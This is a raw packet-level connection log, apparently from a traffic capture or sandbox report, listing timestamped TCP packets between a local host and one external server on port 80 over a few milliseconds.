Apr 19, 2022 16:44:44.488826990 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.488931894 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.488977909 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.488992929 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.489121914 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.489243031 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.489250898 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.489377022 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.489417076 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.489490986 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.489577055 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.489653111 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.489684105 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.489814043 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.489857912 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.489905119 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.489995956 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.490037918 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.490129948 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.490243912 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.490300894 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.490372896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.490459919 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.490505934 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.490657091 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.490680933 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.490736008 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.490806103 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.490932941 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.491019011 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.491059065 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.491143942 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.491182089 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.491252899 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.491374016 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.491487980 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.491533995 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.491600990 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.491638899 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.491715908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.491812944 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.491971016 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.492013931 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.492048979 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.492085934 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.492209911 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.492269039 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.492383957 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.492427111 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.492501974 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.492547035 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.492623091 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.492719889 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.492847919 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.492894888 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.493015051 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.493062019 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.493107080 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.493273973 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.493424892 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.493469954 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.493546009 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.493586063 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.493737936 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.493848085 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.493987083 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.494031906 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.494046926 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.494071960 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.494112968 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.494159937 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.494241953 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.494313002 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.494358063 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.494398117 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.494427919 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.494544983 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.494680882 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.494726896 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.494812012 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.494853973 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.494946003 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.495019913 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.495153904 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.495198011 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.495254040 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.495292902 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.495347023 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.495462894 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.495569944 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.495614052 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.495732069 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.495771885 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.495815992 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.495944977 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.496089935 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.496130943 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.496133089 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.496169090 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.496248960 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.496354103 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.496462107 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.496507883 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.496594906 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.496634007 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.496689081 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.496814013 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.496973038 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.497020960 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.497103930 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.497143984 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.497210026 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.497469902 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.497497082 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.497534037 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.497549057 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.497575045 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.497612953 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.497740030 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.497859001 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.497904062 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.497937918 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.497981071 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.498120070 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.498142958 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.498382092 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.498399973 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.498430967 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.498461962 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.498558998 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.498686075 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.498728991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.498742104 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.498836040 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.498994112 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.499048948 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.499104977 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.499145031 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.499171019 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.499298096 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.499424934 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.499470949 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.499535084 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.499581099 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.499671936 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.499763966 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.499906063 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.499948025 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.500025988 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.500066042 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.500129938 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.500250101 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.500354052 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.500399113 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.500483036 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.500524998 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.500607967 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.500658989 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.500766993 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.500811100 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.500896931 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.500938892 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.500993967 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.501132011 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.501224041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.501264095 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.501343012 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.501384974 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.501456022 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.501615047 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.501696110 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.501739025 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.501806021 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.501846075 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.501946926 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.502016068 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.502142906 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.502185106 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.502252102 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.502293110 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.502346039 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.502458096 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.502600908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.502644062 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.502686024 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.502727032 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.502816916 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.502919912 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.503037930 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.503082037 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.503175974 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.503216982 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.503293991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.503413916 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.503535986 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.503582001 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.503598928 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.503639936 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.503739119 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.503860950 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.503904104 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.503931999 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.504040956 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.504163980 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.504206896 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.504323959 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.504370928 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.504424095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.504548073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.504642963 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.504693031 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.504734993 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.504779100 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.504885912 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.504975080 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.505074978 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.505120039 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.505187988 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.505230904 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.505335093 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.505392075 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.505528927 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.505582094 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.505654097 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.505700111 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.505779028 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.505862951 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.506010056 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.506057024 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.506099939 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.506143093 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.506289005 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.506309986 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.506453037 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.506501913 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.506570101 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.506613970 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.506670952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.506792068 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.506910086 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.506958961 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.507040024 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.507083893 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.507126093 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.507240057 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.507364035 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.507424116 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.507432938 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.507472992 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.507587910 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.507685900 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.507812023 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.507863045 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.507935047 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.507978916 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.508021116 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.508147001 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.508239985 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.508285046 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.508455992 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.508505106 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.508506060 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.508610964 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.508727074 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.508773088 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.508821011 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.508862019 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.508950949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.509027958 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.509166956 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.509219885 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.509248972 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.509288073 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.509358883 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.509479046 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.509598017 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.509665966 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.509766102 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.509809017 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.509828091 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.509928942 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.510057926 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.510114908 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.510230064 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.510278940 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.510327101 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.510391951 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.510515928 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.510570049 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.510641098 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.510684013 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.510734081 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.510860920 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.510977030 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.511023998 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.511121035 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.511163950 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.511173010 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.511312962 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.511430025 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.511476994 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.511576891 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.511619091 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.511643887 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.511790991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.511838913 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.511894941 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.511996031 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.512093067 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.512134075 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.512216091 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.512253046 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.512356997 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.512454987 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.512577057 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.512623072 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.512656927 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.512696981 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.512818098 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.512896061 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.513005972 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.513053894 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.513139009 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.513179064 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.513247967 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.513379097 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.513583899 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.513601065 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.513632059 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.513690948 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.513699055 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.513824940 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.513869047 CEST	49758	80	192.168.2.4	45.135.48.153
